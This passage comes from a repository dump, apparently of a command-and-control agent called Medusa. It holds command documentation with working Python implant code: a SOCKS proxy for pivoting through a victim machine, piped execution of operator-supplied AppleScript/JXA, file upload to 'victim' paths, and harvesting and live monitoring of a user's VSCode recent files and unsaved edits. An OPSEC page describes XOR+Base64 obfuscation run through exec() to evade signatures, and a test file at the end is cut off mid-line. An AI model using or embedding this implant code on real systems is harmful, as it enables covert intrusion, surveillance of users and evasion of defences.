sock\n\n        def connect_to_dst(dst_addr, dst_port):\n            sock = create_socket()\n            if OUTGOING_INTERFACE:\n                try:\n                    sock.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, OUTGOING_INTERFACE.encode())\n                except PermissionError as err: return 0\n            try:\n                sock.connect((dst_addr, dst_port))\n                return sock\n            except socket.error as err: return 0\n\n        def request_client(msg):\n            try:\n                message = base64.b64decode(msg[\"data\"])\n                s5_request = message[:BUFSIZE]\n            except:\n                return False\n            if (s5_request[0:1] != VER or s5_request[1:2] != CMD_CONNECT or s5_request[2:3] != b'\\x00'):\n                return False\n            if s5_request[3:4] == ATYP_IPV4:\n                dst_addr = socket.inet_ntoa(s5_request[4:-2])\n                dst_port = unpack('>H', s5_request[8:len(s5_request)])[0]\n            elif s5_request[3:4] == ATYP_DOMAINNAME:\n                sz_domain_name = s5_request[4]\n                dst_addr = s5_request[5: 5 + sz_domain_name - len(s5_request)]\n                port_to_unpack = s5_request[5 + sz_domain_name:len(s5_request)]\n                dst_port = unpack('>H', port_to_unpack)[0]\n            else: return False\n            return (dst_addr, dst_port)\n\n        def create_connection(msg):\n            dst = request_client(msg)\n            rep = b'\\x07'\n            bnd = b'\\x00' + b'\\x00' + b'\\x00' + b'\\x00' + b'\\x00' + b'\\x00'\n            if dst: \n                socket_dst = connect_to_dst(dst[0], dst[1])\n            if not dst or socket_dst == 0: rep = b'\\x01'\n            else:\n                rep = b'\\x00'\n                bnd = socket.inet_aton(socket_dst.getsockname()[0])\n                bnd += pack(\">H\", socket_dst.getsockname()[1])\n            reply = VER + rep + b'\\x00' + ATYP_IPV4 + bnd\n            try: sendSocksPacket(msg[\"server_id\"], reply, msg[\"exit\"])                \n            except: return\n            if rep == b'\\x00': return socket_dst\n\n        def get_running_socks_thread():\n            return [ t for t in threading.enumerate() if \"socks:\" in t.name and not task_id in t.name ]\n\n        def a2m(server_id, socket_dst):\n            while True:\n                if task_id not in [task[\"task_id\"] for task in self.taskings]: return\n                elif [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]: return\n                if server_id not in self.socks_open.keys(): return\n                try: reader, _, _ = select.select([socket_dst], [], [], 1)\n                except select.error as err: return\n\n                if not reader: continue\n                try:\n                    for sock in reader:\n                        data = sock.recv(BUFSIZE)\n                        if not data:\n                            sendSocksPacket(server_id, b\"\", True)\n                            socket_dst.close()\n                            return\n                        sendSocksPacket(server_id, data, False)\n                except Exception as e: pass\n                time.sleep(SOCKS_SLEEP_INTERVAL)\n\n        def m2a(server_id, socket_dst):\n            while True:\n                if task_id not in [task[\"task_id\"] for task in self.taskings]: return\n                elif [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]: return                \n                if server_id not in self.socks_open.keys():\n                    socket_dst.close()\n                    return\n                try:\n                    if not self.socks_open[server_id].empty():\n                        socket_dst.send(base64.b64decode(self.socks_open[server_id].get(timeout=QUEUE_TIMOUT)))\n                except: pass\n                time.sleep(SOCKS_SLEEP_INTERVAL)\n\n        t_socks = get_running_socks_thread()\n\n        if action == \"start\":\n            if len(t_socks) > 0: return \"[!] SOCKS Proxy already running.\"\n            self.sendTaskOutputUpdate(task_id, \"[*] SOCKS Proxy started.\")\n            while True:\n                if [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]:\n                    return \"[*] SOCKS Proxy stopped.\"\n                if not self.socks_in.empty():\n                    packet_json = self.socks_in.get(timeout=QUEUE_TIMOUT)\n                    if packet_json:\n                        server_id = packet_json[\"server_id\"]\n                        if server_id in self.socks_open.keys():\n                            if packet_json[\"data\"]: \n                                self.socks_open[server_id].put(packet_json[\"data\"])\n                            elif packet_json[\"exit\"]:\n                                self.socks_open.pop(server_id)\n                        else:\n                            if not packet_json[\"exit\"]:    \n                                if activeCount() > MAX_THREADS:\n                                    sleep(3)\n                                    continue\n                                self.socks_open[server_id] = queue.Queue()\n                                sock = create_connection(packet_json)\n                                if sock:\n                                    send_thread = Thread(target=a2m, args=(server_id, sock, ), name=\"a2m:{}\".format(server_id))\n                                    recv_thread = Thread(target=m2a, args=(server_id, sock, ), name=\"m2a:{}\".format(server_id))\n                                    send_thread.start()\n                                    recv_thread.start()\n                time.sleep(SOCKS_SLEEP_INTERVAL)\n        else:\n            if len(t_socks) > 0:\n                for t_sock in t_socks:\n                    task = [task for task in self.taskings if task[\"task_id\"] == t_sock.name.split(\":\")[1]][0]\n                    task[\"stopped\"] = task[\"completed\"] = True\n                self.socks_open = {}\n\n```"
  },
  {
    "path": "documentation-payload/medusa/commands/spawn_jxa.md",
    "content": "+++\ntitle = \"spawn_jxa\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nThis spawns a new instance of `osascript` and uses the subprocess library to pipe uploaded AppleScript/JXA script content to it, preventing the need to drop any script to disk.  \n\n- Python Versions Supported: 2.7, 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500  \n\n### Arguments\n\n#### file\n\n- Description: script file to load into agent\n- Required Value: True  \n- Default Value: None  \n\n#### language\n\n- Description: language of script to execute\n- Required Value: True  \n- Default Value: JavaScript  \n\n## Usage\n\n```\nspawn_jxa\n```\n\n## Detailed Summary\n\nThe python script is downloaded and executed by piping content to the stdin of the newly spawned `osascript` process.\n\n```Python\n    def spawn_jxa(self, task_id, file, language):\n        import os\n        import subprocess\n        \n        total_chunks = 1\n        chunk_num = 0\n        cmd_code = \"\"\n        while (chunk_num < total_chunks):\n            if [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]:\n                return \"Job stopped.\"\n            data = { \"action\": \"post_response\", \"responses\": [\n                    { \"upload\": { \"chunk_size\": CHUNK_SIZE, \"file_id\": file, \"chunk_num\": chunk_num+1 }, \"task_id\": task_id }\n                ]}\n            response = self.postMessageAndRetrieveResponse(data)\n            chunk = response[\"responses\"][0]\n            chunk_num+=1\n            total_chunks = chunk[\"total_chunks\"]\n            cmd_code += base64.b64decode(chunk[\"chunk_data\"]).decode()\n            \n        if cmd_code: \n            args = []\n            if language == \"JavaScript\":\n                args = [\"osascript\", \"-l\", \"JavaScript\", \"-\"]\n            elif language == \"AppleScript\":\n                args = [\"osascript\", \"-\"]\n\n            osapipe = subprocess.Popen(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, \n                stderr=subprocess.PIPE)\n\n            osapipe.stdin.write(cmd_code.encode())\n            stdout, stderr = osapipe.communicate()\n            out = stderr if stderr else stdout\n            return str(out)\n        else: return \"Failed to load script\"\n\n```"
  },
  {
    "path": "documentation-payload/medusa/commands/unload.md",
    "content": "+++\ntitle = \"unload\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nUnload an existing capability from the agent. \n     \n- Python Versions Supported: 2.7, 3.8     \n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500  \n\n### Arguments\n\n#### function\n\n- Description: function to unload\n- Required Value: True  \n- Default Value: None  \n\n## Usage\n\n```\nunload function\n```\n\n## Detailed Summary\nNote that this will only unload the function from the instantiation of the Medusa agent class, it won't remove it from any on-disk script that was executed. So consider using this in a `load` then `unload` scenario.\n\n```Python\n    def unload(self, task_id, command):\n        delattr(medusa, command)\n        cmd_list = [{\"action\": \"remove\", \"cmd\": command}]\n        responses = [{ \"task_id\": task_id, \"user_output\": \"Unloaded command: {}\".format(command), \"commands\": cmd_list, \"completed\": True }]\n        message = { \"action\": \"post_response\", \"responses\": responses }\n        response_data = self.postMessageAndRetrieveResponse(message)\n\n```"
  },
  {
    "path": "documentation-payload/medusa/commands/unload_module.md",
    "content": "+++\ntitle = \"unload_module\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nUnloads a module that is currently loaded in-memory.\n\n>**NOTE** If the module has already been imported in a custom script, it will remain importable in subsequent scripts.\n\n\n- Python Versions Supported: 2.7, 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500\n\n### Arguments\n\n#### module_name\n\n- Description: the name of the module to unload, e.g. 'dns'\n- Required Value: True  \n- Default Value: None  \n\n## Usage\n\n```\nunload_module module_name\n```\n\n## Detailed Summary\n\nThis function removes the custom finder added to the `meta_path`. It also removes the zip file from the agent dictionary:\n\n```Python\n    def unload_module(self, task_id, module_name):\n        if module_name in self._meta_cache:\n            finder = self._meta_cache.pop(module_name)\n            sys.meta_path.remove(finder)\n            self.moduleRepo.pop(module_name)\n            return \"{} module unloaded\".format(module_name)\n        else: return \"{} not found in loaded modules\".format(module_name)\n\n```"
  },
  {
    "path": "documentation-payload/medusa/commands/upload.md",
    "content": "+++\ntitle = \"upload\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nUpload a file to the target machine by selecting a file from your computer. \n     \n- Python Versions Supported: 2.7, 3.8     \n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500  \n\n### Arguments\n\n#### file\n\n- Description: file to upload   \n- Required Value: True  \n- Default Value: None  \n\n#### remote_path\n\n- Description: /remote/path/on/victim.txt  \n- Required Value: True  \n- Default Value: None  \n\n## Usage\n\n```\nupload\n```\n\n## MITRE ATT&CK Mapping\n\n- T1132  \n- T1030  \n- T1105  \n\n## Detailed Summary\nThis function uses API calls to chunk and transfer a file down from Mythic to the agent, then uses API calls to write the file out to disk:\n\n```Python\n    def upload(self, task_id, file, remote_path):\n        total_chunks = 1\n        chunk_num = 0\n        with open(remote_path, \"wb\") as f:\n            while (chunk_num < total_chunks):\n                if [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]:\n                    return \"Job stopped.\"\n\n                data = { \n                    \"action\": \"post_response\",\n                    \"responses\": [\n                        {\n                            \"upload\": {\n                                \"chunk_size\": CHUNK_SIZE,\n                                \"file_id\": file, \n                                \"chunk_num\": chunk_num,\n                                \"full_path\": remote_path\n                            },\n                            \"task_id\": task_id\n                        }\n                    ] \n                }\n                response = self.postMessageAndRetrieveResponse(data)\n                chunk = response[\"responses\"][0]\n                chunk_num+=1\n                total_chunks = chunk[\"total_chunks\"]\n                f.write(base64.b64decode(chunk[\"chunk_data\"]))\n\n```\nAfter successfully writing the file to disk, the agent will report back the final full path so that it can be tracked within the UI.\n"
  },
  {
    "path": "documentation-payload/medusa/commands/vscode_list_recent.md",
    "content": "+++\ntitle = \"vscode_list_recent\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nThis uses the Python `sqlite` library to query VSCode state databases and return the contents.\n\n- Python Versions Supported: 2.7, 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500  \n\n## Usage\n\n```\nvscode_list_recent [state_db]\n```\n\n## Detailed Summary\nMedusa uses the `sqlite` library to query the contents of the local users VSCode state database. The list of recently opened files and folders are then queried in this database, and the results formatted by a browser script in the UI.\n\n```Python\n    def vscode_list_recent(self, task_id, db=\"\"):\n        import os, sqlite3, json\n        \n        path = db if db else \"/Users/{}/Library/Application Support/Code/User/globalStorage/state.vscdb\".format(os.environ[\"USER\"])\n        recent_files = []\n\n        if not os.path.exists(path):\n            return \"VSCode State database path does not exist!\"\n\n        with sqlite3.connect(path) as con:\n            for row in con.execute('SELECT * FROM \"ItemTable\" WHERE KEY = \"history.recentlyOpenedPathsList\"'):\n                data = json.loads(row[1])\n                for entry in data[\"entries\"]:\n                    recent_file = {}\n                    if \"folderUri\" in entry:\n                        recent_file[\"path\"] = entry[\"folderUri\"].replace(\"file://\", \"\")\n                        recent_file[\"type\"] = \"folder\"\n                    elif \"fileUri\" in entry:\n                        recent_file[\"path\"] = entry[\"fileUri\"].replace(\"file://\", \"\")\n                        recent_file[\"type\"] = \"file\"\n                    recent_files.append(recent_file)\n        return { \"recents\": recent_files }\n\n```"
  },
  {
    "path": "documentation-payload/medusa/commands/vscode_open_edits.md",
    "content": "+++\ntitle = \"vscode_open_edits\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nThis recurses the VSCode Backups directory and reads each file found to discern which files have been opened in VSCode and not yet saved (or are entirely new and unsaved files).\n\n- Python Versions Supported: 2.7, 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500  \n\n## Usage\n\n```\nvscode_open_edits [backup_dir_path]\n```\n\n## Detailed Summary\nThis recurses a given VSCode Backups directory - by default, `/Library/Application Support/Code/Backups` - and reads each file. Details of which file is being edited as well as some metadata is extracted and returned to Mythic, where it's rendered by a browser script for the UI.\n\n```Python\n    def vscode_open_edits(self, task_id, backups_path=\"\"):\n        import os, json\n        import time\n\n        path = backups_path if backups_path else \"/Users/{}/Library/Application Support/Code/Backups\".format(os.environ[\"USER\"])\n\n        if not os.path.exists(path):\n            return \"VSCode backups folder does not exist!\"\n\n        open_edits = []\n        for root, dirs, files in os.walk(path):\n            for file in files:\n                if file != \".DS_Store\" and file != \"workspaces.json\":\n                    open_edit = {}\n                    path = os.path.join(root, file)\n                    with open(path, \"r\") as f:\n                        file_content = f.readlines()\n                        json_data = json.loads(\"{\" + file_content[0].split(\"{\")[1].rstrip())\n                        if os.path.basename(root) == \"untitled\":\n                            open_edit[\"backup\"] = path\n                            open_edit[\"original\"] = file_content[0].split(\"{\")[0].replace(\"untitled:\",\"\").rstrip()\n                            open_edit[\"size\"] = \"\"\n                            open_edit[\"mtime\"] = \"\"\n                            open_edit[\"ctime\"] = \"\"\n                            open_edit[\"type\"] = \"New\"\n                        else:\n                            open_edit[\"backup\"] = path\n                            open_edit[\"original\"] = file_content[0].split(\"{\")[0].replace(\"file://\",\"\").rstrip()\n                            open_edit[\"size\"] = f\"{json_data['size']} B\"\n                            open_edit[\"mtime\"] = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(json_data[\"mtime\"]/1000))\n                            open_edit[\"ctime\"] = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(json_data[\"ctime\"]/1000))\n                            open_edit[\"type\"] = \"Edit\"\n                    open_edits.append(open_edit)\n        return { \"edits\" : open_edits }\n```"
  },
  {
    "path": "documentation-payload/medusa/commands/vscode_watch_edits.md",
    "content": "+++\ntitle = \"vscode_watch_edits\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nContinuously poll a VSCode backups directory and report any unsaved edits.\n\n- Python Versions Supported: 2.7, 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500\n\n### Arguments\n\n#### backups path\n\n- Description: VSCode backups folder to monitor\n- Required Value: False  \n- Default Value: ~/Library/Application Support/Code/Backups  \n\n#### polling frequency\n\n- Description: interval in seconds to wait between polling for changes\n- Required Value: True  \n- Default Value: None  \n\n\n## Usage\n\n```\nvscode_watch_edits [path to remote dir] [poll_interval]\n```\n\n\n## Detailed Summary\n\n```Python\n    def vscode_watch_edits(self, task_id, backups_path=\"\", seconds=1):\n        import hashlib, time, os, json\n\n        known_files = {}\n\n        def getOriginalFileDetails(path):\n            with open(path, \"r\") as f:\n                file_content = f.readlines()\n                json_data = json.loads(\"{\" + file_content[0].split(\"{\")[1].rstrip()) \n                return (\n                    file_content[0].split(\"{\")[0].replace(\"untitled:\",\"\").replace(\"file://\",\"\").rstrip(),\n                    json_data[\"size\"],\n                    time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(json_data[\"mtime\"]/1000))\n                )\n\n        def diffFolder(file_path, print_out=True):\n            for root, dirs, files in os.walk(file_path):\n                for dir in dirs:\n                    full_dir_path = os.path.join(root, dir)\n                    if full_dir_path not in known_files.keys():\n                        if print_out: self.sendTaskOutputUpdate(task_id,\"\\n\\n[*] New Directory: {}\".format(full_dir_path)\t)\n                        known_files[full_dir_path] = \"\"\n\n                for file in files:\n                    full_file_path = os.path.join(root, file)\n                    file_size = 0  \n                    try: \n                        with open(full_file_path, \"rb\") as in_f:\n                            file_data = in_f.read()\n                            file_size = len(file_data)\n                    except: continue \n\n                    hash = hashlib.md5(file_data).hexdigest()\n\n                    if full_file_path not in known_files.keys() and hash not in known_files.values():\n                        if print_out: \n                            original_file_path, size, modified_time = getOriginalFileDetails(full_file_path)\n                            self.sendTaskOutputUpdate(task_id,\"\\n\\n[*] New File: \\n - Backup File: {} ({} bytes) \\n - Original File: {} ({} bytes) - Last Modified: {}\".format(\n                                full_file_path, file_size, original_file_path, size, modified_time))\n                        known_files[full_file_path] = hash\n                    \n                    elif full_file_path in known_files.keys() and hash not in known_files.values():\n                        if print_out: \n                            original_file_path, size, modified_time = getOriginalFileDetails(full_file_path)\n                            self.sendTaskOutputUpdate(task_id,\"\\n\\n[*] File Updated: \\n - Backup File: {} ({} bytes) \\n - Original File: {} ({} bytes) - Last Modified: {}\".format(\n                                full_file_path, file_size, original_file_path, size, modified_time))\n\n                        known_files[full_file_path] = hash\n                    \n                    elif full_file_path not in known_files.keys() and hash in known_files.values():\n                        orig_file = [f for f,h in known_files.items() if h == hash][0]\n                        if os.path.exists(os.path.join(file_path, orig_file)):\n                            if print_out: self.sendTaskOutputUpdate(task_id,\"\\n\\n[*] Copied File: {}->{} - {} bytes ({})\".format(orig_file, full_file_path, file_size, hash))\n                        else:\n                            if print_out: self.sendTaskOutputUpdate(task_id,\"\\n\\n[*] Moved File: {}->{} - {} bytes ({})\".format(orig_file, full_file_path, file_size, hash))\n                            known_files.pop(orig_file)\n                    \n                    known_files[full_file_path] = hash\n            \n            for file in list(known_files):\n                if not os.path.isdir(os.path.dirname(file)):\n                    for del_file in [f for f in list(known_files) if f.startswith(os.path.dirname(file))]:\n                        obj_type = \"Directory\" if not known_files[del_file] else \"File\"\n                        if file in list(known_files):\n                            if print_out: self.sendTaskOutputUpdate(task_id,\"\\n\\n[*] {} deleted: {} {}\".format(obj_type, \\\n                                del_file, \"({})\".format(known_files[del_file]) if known_files[del_file] else \"\"))\n                            known_files.pop(file)\n            \n                else:\n                    if os.path.basename(file) not in os.listdir(os.path.dirname(file)):\n                        obj_type = \"Directory\" if not known_files[file] else \"File\"\n                        if print_out: self.sendTaskOutputUpdate(task_id,\"\\n\\n[*] {} Deleted: {} {}\".format(obj_type, file, \\\n                            \"({})\".format(known_files[file]) if known_files[file] else \"\"))\n                        known_files.pop(file)\n\n        path = backups_path if backups_path else \"/Users/{}/Library/Application Support/Code/Backups\".format(os.environ[\"USER\"])\n\n        if not os.path.isdir(path):\n            return \"[!] Path must be a valid directory\"\n        elif not os.access(path, os.R_OK):\n            return \"[!] Path not accessible\"\n        else:\n            self.sendTaskOutputUpdate(task_id, \"[*] Starting directory watch for {}\".format(path))\n            diffFolder(path, False) \n            while(True):\n                if not os.path.exists(path):\n                    return  \"[!] Root directory has been deleted.\"\n                diffFolder(path)\n                time.sleep(seconds)\n\n```\n\n"
  },
  {
    "path": "documentation-payload/medusa/commands/watch_dir.md",
    "content": "+++\ntitle = \"watch_dir\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nContinuously poll a directory and report any changes, e.g. new files, deletions, etc.\n\n- Python Versions Supported: 2.7, 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500\n\n### Arguments\n\n#### path\n\n- Description: folder to monitor\n- Required Value: True  \n- Default Value: None  \n\n#### polling frequency\n\n- Description: interval in seconds to wait between polling for changes\n- Required Value: True  \n- Default Value: None  \n\n\n## Usage\n\n```\nwatch_dir {path to remote dir} poll_interval\n```\n\n\n## Detailed Summary\n\n```Python\n    def watch_dir(self, task_id, path, seconds):\n        import hashlib\n        known_files = {}\n        def diffFolder(file_path, print_out=True):\n            for root, dirs, files in os.walk(file_path):\n                for dir in dirs:\n                    full_dir_path = os.path.join(root, dir)\n                    if full_dir_path not in known_files.keys():\n                        if print_out: self.sendTaskOutputUpdate(task_id, \"[*] New Directory: {}\".format(full_dir_path)\t)\n                        known_files[full_dir_path] = \"\"\n\n                for file in files:\n                    full_file_path = os.path.join(root, file)\n                    file_size = 0  \n                    try: \n                        with open(full_file_path, \"rb\") as in_f:\n                            file_data = in_f.read()\n                            file_size = len(file_data)\n                    except: continue\n\n                    hash = hashlib.md5(file_data).hexdigest()\n\n                    if full_file_path not in known_files.keys() and hash not in known_files.values():\n                        if print_out: self.sendTaskOutputUpdate(task_id, \"[*] New File: {} - {} bytes ({})\".format(full_file_path, file_size, hash))\n                        known_files[full_file_path] = hash\n                    elif full_file_path in known_files.keys() and hash not in known_files.values():\n                        if print_out: self.sendTaskOutputUpdate(task_id, \"[*] File Updated: {} - {} bytes ({})\".format(full_file_path, file_size, hash))\n                        known_files[full_file_path] = hash\n                    elif full_file_path not in known_files.keys() and hash in known_files.values():\n                        orig_file = [f for f,h in known_files.items() if h == hash][0]\n                        if os.path.exists(os.path.join(file_path, orig_file)):\n                            if print_out: self.sendTaskOutputUpdate(task_id, \"[*] Copied File: {}->{} - {} bytes ({})\".format(orig_file, full_file_path, file_size, hash))\n                        else:\n                            if print_out: self.sendTaskOutputUpdate(task_id, \"[*] Moved File: {}->{} - {} bytes ({})\".format(orig_file, full_file_path, file_size, hash))\n                            known_files.pop(orig_file)\n                    known_files[full_file_path] = hash\n            for file in list(known_files):\n                if not os.path.isdir(os.path.dirname(file)):\n                    for del_file in [f for f in list(known_files) if f.startswith(os.path.dirname(file))]:\n                        obj_type = \"Directory\" if not known_files[del_file] else \"File\"\n                        if file in list(known_files):\n                            if print_out: self.sendTaskOutputUpdate(task_id, \"[*] {} deleted: {} {}\".format(obj_type, \\\n                                del_file, \"({})\".format(known_files[del_file]) if known_files[del_file] else \"\"))\n                            known_files.pop(file)\n                else:\n                    if os.path.basename(file) not in os.listdir(os.path.dirname(file)):\n                        obj_type = \"Directory\" if not known_files[file] else \"File\"\n                        if print_out: self.sendTaskOutputUpdate(task_id, \"[*] {} deleted: {} {}\".format(obj_type, file, \\\n                            \"({})\".format(known_files[file]) if known_files[file] else \"\"))\n                        known_files.pop(file)\n    \n        if path == \".\": file_path = self.current_directory\n        else: file_path = path if path[0] == os.sep \\\n                else os.path.join(self.current_directory,path)\n\n        if not os.path.isdir(file_path):\n            return \"[!] Path must be a valid directory\"\n        else:\n            self.sendTaskOutputUpdate(task_id, \"[*] Starting directory watch for {}\".format(path))\n            diffFolder(file_path, False) \n            while(True):\n                if [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]: return \"Job stopped.\"\n                if not os.path.exists(file_path):\n                    return \"[!] Root directory has been deleted.\"\n                diffFolder(file_path)\n                time.sleep(seconds)\n\n```\n\n"
  },
  {
    "path": "documentation-payload/medusa/development.md",
    "content": "+++\ntitle = \"Development\"\nchapter = false\nweight = 20\npre = \"<b>3. </b>\"\n+++\n\n## Adding Commands\n\nCommands are located in `Payload_Type/medusa/medusa/agent_code/`. Notably, there are three file extensions you might encounter. A given command can be included solely as a `.py`, if it could be used in a Python 2.7 or 3.8 script with no modification. Where changes are required, be that due to syntax, libraries, etc. a `.py2` and/or `.py3` file is used. These are looked up at payload build-time to ensure the correct function code is included.\n\nIn addition to the `.py*` files above, the function definitions found in `Payload_Type/medusa/medusa/mythic/agent_functions/` include an attribute that specifies which versions of Python a given function is compatible with (as well as which OSs). Using the `download` function as an example:\n\n```Python\nclass DownloadCommand(CommandBase):\n    cmd = \"download\"\n    ...\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[ SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ],\n    )\n```\n\nHere we can see that the download function is supported by all OSs and both versions of Python.\n\nWhen it comes to dynamic function loading, this `supported_python_versions` attribute is used by the `load` command to ensure only compatible functions are presented in the UI for loading into a live agent (see below).\n\n```Python\nasync def get_commands(self, callback: dict) -> [str]:\n\tresp = await MythicRPC().execute(\"get_callback_commands\", callback_id=callback[\"id\"])\n\treturn [ cmd[\"cmd\"] for cmd in resp.response if callback[\"build_parameters\"][\"python_version\"] in cmd[\"attributes\"][\"supported_python_versions\"]]\n\n```\n\nAll commands follow the general format below (where `command_name` is the name of the command you'd type in the U)):\n\n```Python\n    def command_name(self, task_id, input):\n\t\tdoThing(input)\n\t\treturn \"output for mythic\"\n\n```\n \nIt's worth noting that the `task_id` argument is always passed in to a function. This allows any function to look up its own task in the Medusa agent's `self.taskings` variable. Amongst other things, this allows it to check if its been set to a 'stopped' state by the main thread and should therefore cease execution.\n\nSimilarly, as all functions are read and concatenated at build-time, we need to respect tabulation to ensure the resulting Python script actually runs. As a result, every function is 4-spaces indented.\n\n\n### Available Components within Commands\n\nInside of commands, you get access to certain extra functions and information that's part of the agent overall.\n\nFirstly, as mentioned above, we have the `task_id` value. When implementing long-running functions using while-loops for example, we can include a check to make sure we're good to keep going. This can be implemented as below:\n\n```Python\n\tdef long_running_task(self, task_id):\n\t\twhile True:\n\t\t\tif [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]: return \"Job stopped.\"\n\t\t\t# do some cool stuff\n```\n\nSimilarly, where our function has mid-execution output to stream back to Mythic, there is an included `sendTaskOutputUpdate()` function which can be used to send updates. It's worth noting that this function is _currently_ not tied into the main thread responses, and will send data back to Mythic immediately upon execution.\n\nThis function can be executed within a function as below:\n\n```Python\n\tdef streamed_output(self, task_id):\n\t\t# Send output back to Mythic\n\t\tself.sendTaskOutputUpdate(self, task_id, \"We're running\")\n\t\ttime.sleep(1)\n\t\tself.sendTaskOutputUpdate(self, task_id, \"We slept a little\")\n\t\ttime.sleep(10000)\n\t\tself.sendTaskOutputUpdate(self, task_id, \"what year is it?!?\")\n```\n\n\n## Modifying base agent behavior\n\nThe base agent templates can be found at `Payload_Type/medusa/medusa/agent_code/base_agent/`. Just as with functions, there are `.py2` and `.py3` files included for the two supported Python versions.\n\nMedusa supports use of either the non-default `cryptography` library (installed on macOS, but not ubiquitous elsewhere) or a manual crypto implementation using built-in libraries for its encrypted communications. For this reason, within the `base_agent/` directory, you'll see a pair of `crypto_lib` python files and a pair of `manual_crypto` files. As you can probably guess, this allows an agent to pick encryption method across either supported Python version.\n\nThe agent construction now uses a **core + transport** model:\n\n- `base_agent_core.py2` / `base_agent_core.py3` contain shared runtime logic (task loop, task processing, response handling, sleep/killdate, etc.).\n- `transport_http.py2` / `transport_http.py3` contain HTTP-specific networking and config snippets.\n- `transport_azure_blob.py2` / `transport_azure_blob.py3` contain Azure Blob-specific networking and config snippets.\n\nDuring build, the payload builder stitches these together by replacing section markers in the core template (`TRANSPORT_IMPORTS`, `TRANSPORT_CLASS_FIELDS`, `TRANSPORT_FUNCTIONS`, `TRANSPORT_CONFIG`) with content from the selected transport template.\n\nIf you modify shared behavior, update `base_agent_core.py2` and `base_agent_core.py3`. If you modify transport behavior, update the corresponding `transport_*.py2` and `transport_*.py3` files.\n\n## Adding C2 Profiles\n\nMedusa currently supports both `http` and `azure_blob` C2 profiles.\n\nFor new transports, add a matching pair of template files:\n\n- `transport_<name>.py2`\n- `transport_<name>.py3`\n\nwith the required sections:\n\n- `### IMPORTS ###`\n- `### CLASS_FIELDS ###`\n- `### FUNCTIONS ###`\n- `### CONFIG ###`\n\nThen add the profile name to the payload builder's supported `c2_profiles` list."
  },
  {
    "path": "documentation-payload/medusa/opsec.md",
    "content": "+++\ntitle = \"OPSEC\"\nchapter = false\nweight = 10\npre = \"<b>1. </b>\"\n+++\n\n### Process Execution\n\n- The `shell` command spawns a child process which is subject to command-line logging.\n- The `shinject` command (for Windows only) uses the well-known CreateRemoteThread injection technique.\n- The `load_dll` command (for Windows only) needs the DLL to respond with an integer value (and not exit the process) on completion.\n\n### Agent payload\n\nThe build parameters offer an XOR+Base64 obfuscation option. Rather than outputting a more trivially-signaturable script that is clearly readable, Mythic will bundle the code and XOR+Base64 it with a random key. This is then decrypted, decoded and run with `exec()` to ultimately execute the agent.\n\nWith the function `load` available, as well as the potential utility of the `cryptography` library, you could reduce your payload size and capabilities for initial access (potentially using a python one-liner to achieve code execution). The agent can then be updated with additional functions as required.\n\nAn example of the XOR payload compared to the plaintext script can be seen below:\n\n![XOR Payload](/agents/medusa/xor.png)\n"
  },
  {
    "path": "documentation-wrapper/.keep",
    "content": ""
  },
  {
    "path": "tests/test_payload_build_matrix.py",
    "content": "import asyncio\nimport importlib.util\nimport os\nimport pathlib\nimport py_compile\nimport re\nimport shutil\nimport sys\nimport tempfile\nimport types\nimport unittest\n\n\nROOT = pathlib.Path(__file__).resolve().parents[1]\nBUILDER_PATH = ROOT / \"Payload_Type\" / \"medusa\" / \"medusa\" / \"mythic\" / \"agent_functions\" / \"builder.py\"\nAGENT_CODE_PATH = ROOT / \"Payload_Type\" / \"medusa\" / \"medusa\" / \"agent_code\"\nBASE_AGENT_PATH = AGENT_CODE_PATH / \"base_agent\"\n\nPROFILES = (\"http\", \"azure_blob\")\nPY_VERSIONS = (\"Python 2.7\", \"Python 3.8\")\nCRYPTO_IMPLEMENTATIONS = {\n    \"manual_crypto\": \"No\",\n    \"cryptography_lib\": \"Yes\",\n}\n\n\ndef discover_profiles():\n    py2_profiles = {\n        re.match(r\"transport_(.+)\\.py2$\", p.name).group(1)\n        for p in BASE_AGENT_PATH.glob(\"transport_*.py2\")\n        if re.match(r\"transport_(.+)\\.py2$\", p.name)\n    }\n    py3_profiles = {\n        re.match(r\"transport_(.+)\\.py3$\", p.name).group(1)\n        for p in BASE_AGENT_PATH.glob(\"transport_*.py3\")\n        if re.match(r\"transport_(.+)\\.py3$\", p.name)\n    }\n    return tuple(sorted(py2_profiles.intersection(py3_profiles)))\n\n\nPROFILES = discover_profiles()\n\n\ndef python_version_suffix(py_version):\n    return \"py2\" if py_version == \"Python 2.7\" else \"py3\"\n\n\ndef parse_transport_sections(template_code: str):\n    parts = re.split(r\"###\\s*(IMPORTS|CLASS_FIELDS|FUNCTIONS|CONFIG)\\s*###\", template_code)\n    sections = {\"IMPORTS\": \"\", \"CLASS_FIELDS\": \"\", \"FUNCTIONS\": \"\", \"CONFIG\": \"\"}\n    for i 